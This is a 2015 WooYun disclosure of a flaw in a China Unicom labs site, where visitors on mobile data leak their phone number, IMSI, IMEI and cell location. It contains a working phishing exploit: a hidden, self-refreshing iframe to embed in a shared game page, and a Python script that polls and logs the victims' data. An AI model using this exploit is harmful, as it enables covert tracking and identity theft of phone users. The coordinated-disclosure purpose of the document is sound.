当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090676

漏洞标题:利用中国联通所属机构某系统接口缺陷在非Wi-Fi环境下可导致部分手机信息和LBS信息泄露风险

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2015-01-08 16:04

修复时间:2015-02-22 16:06

公开时间:2015-02-22 16:06

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-08: 细节已通知厂商并且等待厂商处理中
2015-01-13: 厂商已经确认,细节仅向厂商公开
2015-01-23: 细节向核心白帽子及相关领域专家公开
2015-02-02: 细节向普通白帽子公开
2015-02-12: 细节向实习白帽子公开
2015-02-22: 细节向公众公开

简要描述:

利用中国联通所属机构某系统接口缺陷在非Wi-Fi环境下可导致部分手机信息和LBS信息泄露风险

详细说明:

http://www.unicomlabs.com/联通此站存在设计缺陷
手机使用3G或4G数据连接访问http://www.unicomlabs.com/ 可查询当前手机号、IMSI、上线基站号、上线小区号、地球座标、火星座标等
通过抓包我们发现 当访问http://www.unicomlabs.com 时 response中iframe了一个链接
http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58
经测试发现 如果手机使用3G或4G数据连接访问http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58

1.jpg


086231202CAB7AB869AD22757424AC69.jpg


此时立即在电脑上同样打开此链接 就能看到你的手机号、IMSI、上线基站号、上线小区号、地球座标、火星座标等信息

2.jpg


利用方法:将链接http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58嵌入到钓鱼页面中发给对方
本地监控该链接可获取对方的手机号等信息
这里我制作了一个html5的小游戏的钓鱼页面,可在微信朋友圈中分享,本地利用脚本实时监控即可。
主要代码:

<SCRIPT LANGUAGE="JavaScript"> 
<!--
function fresh(){
document.getElementById('frame0').src='http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58';
setTimeout("fresh()",5000);
}
setTimeout("fresh()",5000);
//-->
</SCRIPT>
<iframe id="frame0" src="http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58"width="0" height="0" scrolling="yes" frameborder="0" style= "display :none " />


本地端用python写个脚本监控即可

import requests
import re
import sys
type = sys.getfilesystemencoding()
print '监听中...'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36'}
key = '无法检测号码'
for x in xrange(1,100000):
r = requests.get('http://www.unicomlabs.com/Number.asp?unikey=660275b7d6ba757b74587343208f6003#',headers=headers)
s = r.content.decode("gbk").encode(type)
if(s.find(key)>0):
print '第'+str(x)+'次请求'
else:
print '第'+str(x)+'次请求获取数据成功!】'
f=open("un.html",'a')
f.write(s+'\n\n')
f.close()


FD129698E2967E07C7BFF66104EFD805.jpg


屏幕快照 2015-01-08 下午3.49.59.png


2EDA38E1-F3F5-4817-8D3A-B5717BA026BF.png

漏洞证明:

获取到的数据

本机号码	18600*****7
IMSI 460010***6***67
我的话费 点击查看
承载网络 WCDMA
接入APN 3GNET
终端IMEI 355***05344***0
终端型号 HTC HTC 802w
生产厂商 HTC Corp
上线基站号 41**2
上线小区号 22**1
地球座标 E116.**01,N40.0**6
火星座标 E116.2**22,N40.0**86


staticimage.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-01-13 11:57

厂商回复:

CNVD确认所述情况,将由CNCERT向中国联通通报。

最新状态:

暂无